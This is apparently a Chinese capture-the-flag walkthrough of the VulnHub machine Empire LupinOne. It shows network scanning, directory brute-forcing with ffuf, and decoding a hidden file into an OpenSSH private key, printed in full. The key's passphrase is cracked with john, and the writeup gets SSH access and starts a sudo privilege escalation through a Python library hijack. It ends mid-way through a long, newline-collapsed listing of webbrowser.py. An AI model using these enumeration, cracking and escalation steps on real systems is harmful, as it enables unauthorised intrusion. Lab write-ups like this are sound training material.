靶机描述

靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/

Description

Difficulty: Medium

This box was created to be medium, but it can be hard if you get lost.

CTF like box. You have to enumerate as much as you can.

For hints discord Server ( https://discord.gg/7asvAhCEhe )

一、搭建靶机环境

攻击机Kali

IP地址:192.168.184.128

靶机

IP地址:192.168.184.144

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

2.1.3 尝试访问靶机网页

2.1.4 目录扫描

☁  kali  dirb http://192.168.184.144/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan  5 16:54:38 2022
URL_BASE: http://192.168.184.144/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.184.144/ ----
==> DIRECTORY: http://192.168.184.144/image/
+ http://192.168.184.144/index.html (CODE:200|SIZE:333)
==> DIRECTORY: http://192.168.184.144/javascript/
==> DIRECTORY: http://192.168.184.144/manual/
+ http://192.168.184.144/robots.txt (CODE:200|SIZE:34)
+ http://192.168.184.144/server-status (CODE:403|SIZE:280)                                                             ---- Entering directory: http://192.168.184.144/image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.184.144/javascript/ ----
==> DIRECTORY: http://192.168.184.144/javascript/jquery/                                                               ---- Entering directory: http://192.168.184.144/manual/ ----
==> DIRECTORY: http://192.168.184.144/manual/da/
==> DIRECTORY: http://192.168.184.144/manual/de/
==> DIRECTORY: http://192.168.184.144/manual/en/
==> DIRECTORY: http://192.168.184.144/manual/es/
==> DIRECTORY: http://192.168.184.144/manual/fr/
==> DIRECTORY: http://192.168.184.144/manual/images/
···
···
···
-----------------
END_TIME: Wed Jan  5 16:58:44 2022
DOWNLOADED: 387408 - FOUND: 85

查看相关URL

2.2枚举漏洞

22 端口分析

一般只能暴力破解,暂时没有合适的字典

80 端口分析

访问 80 端口

使用 ffuf 工具暴力破解目录

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.184.144/~FUZZ'

参数解释:
-c 有颜色输出
-w 指定字典
-u 指定暴力破解的目录,FUZZ 就是暴力破解的目录

可以看出目录是 secret

访问:http://192.168.184.144/~secret/

能看到这两个字眼,具体意思咱们去翻译一下

这段话的意思是不是用户名为 icex64

然后ssh私钥登陆,其私钥文件应该就藏在这个目录下

这可能需要暴力破解了
暴力破解文件使用 fasttrack 破解
尝试使用 kali 中的字典暴力破解

ffuf -c -w /usr/share/wordlists/fasttrack.txt -u 'http://192.168.184.144/~secret/.FUZZ' -fc 403 -e .txt,.html

参数:
-c 颜色输出

-w 指定字典

-u 指定 URL,URL 中 FUZZ 是需要爆破的文件名

-fc 过滤指定的返回状态码

-e 逗号分隔的扩展名列表。可以指定爆破的文件扩展名

啥也咩有,那咱们换个字典试试吧

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.184.144/~secret/.FUZZ' -fc 403 -e .txt,.html

下载文件:http://192.168.184.144/~secret/.mysecret.txt

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

看着比较像 base64,使用在线网站识别算法

https://www.dcode.fr/cipher-identifier

base58解密后得到

-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----

将内容复制出来保存为文件ssh.key

2.3漏洞利用

2.3.1 破解 sshkey 密码 getshell

在 kali 中搜索 ssh2john工具

☁  kali  locate ssh2john

将 ssh.key 转为 john 能识别的 hash

☁  vulnhub  /usr/share/john/ssh2john.py ssh.key > hash

使用 john 破解 hash

☁  vulnhub  john --wordlist=/usr/share/wordlists/fasttrack.txt hash

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mxizxhsF-1650254335673)(https://s2.loli.net/2022/01/06/mTzk2RLUqSw6ZrC.png)]

得到密码:P@55w0rd!
尝试登陆 SSH

☁  vulnhub  ssh icex64@192.168.184.144 -i ssh.key

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NpjPIjrZ-1650254335673)(https://s2.loli.net/2022/01/06/758XFd6ivkwhLyQ.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dhf7Akf7-1650254335674)(https://s2.loli.net/2022/01/06/Mwrm4latKXVNs3k.png)]

2.4权限提升

2.4.1 寻找 suid 权限程序提权

在 shell 中寻找 suid 程序:find / -perm -u=s -type f 2>/dev/null

icex64@LupinOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd

没有发现(在 https://gtfobins.github.io/对比)

2.4.2 使用 sudo 程序获取用户 arsene 的 shell

在 shell 中执行命令:sudo -l

icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser icex64 may run the following commands on LupinOne:(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

发现不需要密码可以执行 arsene 用户目录下的文件:
sudo /usr/bin/python3.9 /home/arsene/heist.py

咱们先进入/home/arsene/

icex64@LupinOne:/$ cd /home/arsene/
icex64@LupinOne:/home/arsene$ ls
heist.py  note.txt

查看note.txt文件

icex64@LupinOne:/home/arsene$ cat note.txt
Hi my friend Icex64,Can you please help check if my code is secure to run, I need to use for my next heist.I dont want to anyone else get inside it, because it can compromise my account and find my secret file.Only you have access to my program, because I know that your account is secure.See you on the other side.Arsene Lupin.

查看 heist.py文件

icex64@LupinOne:/home/arsene$ cat heist.py
import webbrowserprint ("Its not yet ready to get in action")webbrowser.open("https://empirecybersecurity.co.mz")

可以看到heist.py脚本本身没有什么代码,但导入了一个模块:webbrowser
查找 webbrowser.py

icex64@LupinOne:~$ whereis webbrowser.py
webbrowser:
icex64@LupinOne:~$ locate webbrowser.py

咋没有捏

icex64@LupinOne:~$ python --version
-bash: python: command not found
icex64@LupinOne:~$ python3 --version
Python 3.9.2

既然命令找不到,咱们直接去Python目录下去找

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T7lOkOR4-1650254335674)(https://s2.loli.net/2022/01/06/glQ9CnGtK31mFSA.png)]

查看一下其内容

cex64@LupinOne:/usr/lib/python3.9$ cat webbrowser.py
#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.import os
import shlex
import shutil
import sys
import subprocess
import threading__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]class Error(Exception):pass_lock = threading.RLock()
_browsers = {}                  # Dictionary of available browser controllers
_tryorder = None                # Preference order of available browsers
_os_preferred_browser = None    # The preferred browserdef register(name, klass, instance=None, *, preferred=False):"""Register a browser connector."""with _lock:if _tryorder is None:register_standard_browsers()_browsers[name.lower()] = [klass, instance]# Preferred browsers go to the front of the list.# Need to match to the default browser returned by xdg-settings, which# may be of the form e.g. "firefox.desktop".if preferred or (_os_preferred_browser and name in _os_preferred_browser):_tryorder.insert(0, name)else:_tryorder.append(name)def get(using=None):"""Return a browser launcher instance appropriate for the environment."""if _tryorder is None:with _lock:if _tryorder is None:register_standard_browsers()if using is not None:alternatives = [using]else:alternatives = _tryorderfor browser in alternatives:if '%s' in browser:# User gave us a command line, split it into name and argsbrowser = shlex.split(browser)if browser[-1] == '&':return BackgroundBrowser(browser[:-1])else:return GenericBrowser(browser)else:# User gave us a browser name or path.try:command = _browsers[browser.lower()]except KeyError:command = _synthesize(browser)if command[1] is not None:return command[1]elif command[0] is not None:return command[0]()raise Error("could not locate runnable browser")# Please note: the following definition hides a builtin function.
# It is recommended one does "import webbrowser" and uses webbrowser.open(url)
# instead of "from webbrowser import *".def open(url, new=0, autoraise=True):"""Display url using the default browser.If possible, open url in a location determined by new.- 0: the same browser window (the default).- 1: a new browser window.- 2: a new browser page ("tab").If possible, autoraise raises the window (the default) or not."""if _tryorder is None:with _lock:if _tryorder is None:register_standard_browsers()for name in _tryorder:browser = get(name)if browser.open(url, new, autoraise):return Truereturn Falsedef open_new(url):"""Open url in a new window of the default browser.If not possible, then open url in the only browser window."""return open(url, 1)def open_new_tab(url):"""Open url in a new page ("tab") of the default browser.If not possible, then the behavior becomes equivalent to open_new()."""return open(url, 2)def _synthesize(browser, *, preferred=False):"""Attempt to synthesize a controller based on existing controllers.This is useful to create a controller when a user specifies a path toan entry in the BROWSER environment variable -- we can copy a generalcontroller to operate using a specific installation of the desiredbrowser in this way.If we can't create a controller in this way, or if there is noexecutable for the requested browser, return [None, None]."""cmd = browser.split()[0]if not shutil.which(cmd):return [None, None]name = os.path.basename(cmd)try:command = _browsers[name.lower()]except KeyError:return [None, None]# now attempt to clone to fit the new name:controller = command[1]if controller and name.lower() == controller.basename:import copycontroller = copy.copy(controller)controller.name = browsercontroller.basename = os.path.basename(browser)register(browser, None, instance=controller, preferred=preferred)return [None, controller]return [None, None]# General parent classesclass BaseBrowser(object):"""Parent class for all browsers. Do not use directly."""args = ['%s']def __init__(self, name=""):self.name = nameself.basename = namedef open(self, url, new=0, autoraise=True):raise NotImplementedErrordef open_new(self, url):return self.open(url, 1)def open_new_tab(self, url):return self.open(url, 2)class GenericBrowser(BaseBrowser):"""Class for all browsers started with a commandand without remote functionality."""def __init__(self, name):if isinstance(name, str):self.name = nameself.args = ["%s"]else:# name should be a list with argumentsself.name = name[0]self.args = name[1:]self.basename = os.path.basename(self.name)def open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)cmdline = [self.name] + [arg.replace("%s", url)for arg in self.args]try:if sys.platform[:3] == 'win':p = subprocess.Popen(cmdline)else:p = subprocess.Popen(cmdline, close_fds=True)return not p.wait()except OSError:return Falseclass BackgroundBrowser(GenericBrowser):"""Class for all browsers which are to be started in thebackground."""def open(self, url, new=0, autoraise=True):cmdline = [self.name] + [arg.replace("%s", url)for arg in self.args]sys.audit("webbrowser.open", url)try:if sys.platform[:3] == 'win':p = subprocess.Popen(cmdline)else:p = subprocess.Popen(cmdline, close_fds=True,start_new_session=True)return (p.poll() is None)except OSError:return Falseclass UnixBrowser(BaseBrowser):"""Parent class for all Unix browsers with remote functionality."""raise_opts = Nonebackground = Falseredirect_stdout = True# In remote_args, %s will be replaced with the requested URL.  %action will# be replaced depending on the value of 'new' passed to open.# remote_action is used for new=0 (open).  If newwin is not None, it is# used for new=1 (open_new).  If newtab is not None, it is used for# new=3 (open_new_tab).  After both substitutions are made, any empty# strings in the transformed remote_args list will be removed.remote_args = ['%action', '%s']remote_action = Noneremote_action_newwin = Noneremote_action_newtab = Nonedef _invoke(self, args, remote, autoraise, url=None):raise_opt = []if remote and self.raise_opts:# use autoraise argument only for remote invocationautoraise = int(autoraise)opt = self.raise_opts[autoraise]if opt: raise_opt = [opt]cmdline = [self.name] + raise_opt + argsif remote or self.background:inout = subprocess.DEVNULLelse:# for TTY browsers, we need stdin/outinout = Nonep = subprocess.Popen(cmdline, close_fds=True, stdin=inout,stdout=(self.redirect_stdout and inout or None),stderr=inout, start_new_session=True)if remote:# wait at most five seconds. If the subprocess is not finished, the# remote invocation has (hopefully) started a new instance.try:rc = p.wait(5)# if remote call failed, open() will try direct invocationreturn not rcexcept subprocess.TimeoutExpired:return Trueelif self.background:if p.poll() is None:return Trueelse:return Falseelse:return not p.wait()def open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)if new == 0:action = self.remote_actionelif new == 1:action = self.remote_action_newwinelif new == 2:if self.remote_action_newtab is None:action = self.remote_action_newwinelse:action = self.remote_action_newtabelse:raise Error("Bad 'new' parameter to open(); " +"expected 0, 1, or 2, got %s" % new)args = [arg.replace("%s", url).replace("%action", action)for arg in self.remote_args]args = [arg for arg in args if arg]success = self._invoke(args, True, autoraise, url)if not success:# remote invocation failed, try straight wayargs = [arg.replace("%s", url) for arg in self.args]return self._invoke(args, False, False)else:return Trueclass Mozilla(UnixBrowser):"""Launcher class for Mozilla browsers."""remote_args = ['%action', '%s']remote_action = ""remote_action_newwin = "-new-window"remote_action_newtab = "-new-tab"background = Trueclass Netscape(UnixBrowser):"""Launcher class for Netscape browser."""raise_opts = ["-noraise", "-raise"]remote_args = ['-remote', 'openURL(%s%action)']remote_action = ""remote_action_newwin = ",new-window"remote_action_newtab = ",new-tab"background = Trueclass Galeon(UnixBrowser):"""Launcher class for Galeon/Epiphany browsers."""raise_opts = ["-noraise", ""]remote_args = ['%action', '%s']remote_action = "-n"remote_action_newwin = "-w"background = Trueclass Chrome(UnixBrowser):"Launcher class for Google Chrome browser."remote_args = ['%action', '%s']remote_action = ""remote_action_newwin = "--new-window"remote_action_newtab = ""background = TrueChromium = Chromeclass Opera(UnixBrowser):"Launcher class for Opera browser."remote_args = ['%action', '%s']remote_action = ""remote_action_newwin = "--new-window"remote_action_newtab = ""background = Trueclass Elinks(UnixBrowser):"Launcher class for Elinks browsers."remote_args = ['-remote', 'openURL(%s%action)']remote_action = ""remote_action_newwin = ",new-window"remote_action_newtab = ",new-tab"background = False# elinks doesn't like its stdout to be redirected -# it uses redirected stdout as a signal to do -dumpredirect_stdout = Falseclass Konqueror(BaseBrowser):"""Controller for the KDE File Manager (kfm, or Konqueror).See the output of ``kfmclient --commands``for more information on the Konqueror remote-control interface."""def open(self, url, new=0, autoraise=True):sys.audit("webbrowser.open", url)# XXX Currently I know no way to prevent KFM from opening a new win.if new == 2:action = "newTab"else:action = "openURL"devnull = subprocess.DEVNULLtry:p = subprocess.Popen(["kfmclient", action, url],close_fds=True, stdin=devnull,stdout=devnull, stderr=devnull)except OSError:# fall through to next variantpasselse:p.wait()# kfmclient's return code unfortunately has no meaning as it seemsreturn Truetry:p = subprocess.Popen(["konqueror", "--silent", url],close_fds=True, stdin=devnull,stdout=devnull, stderr=devnull,start_new_session=True)except OSError:# fall through to next variantpasselse:if p.poll() is None:# Should be running now.return Truetry:p = subprocess.Popen(["kfm", "-d", 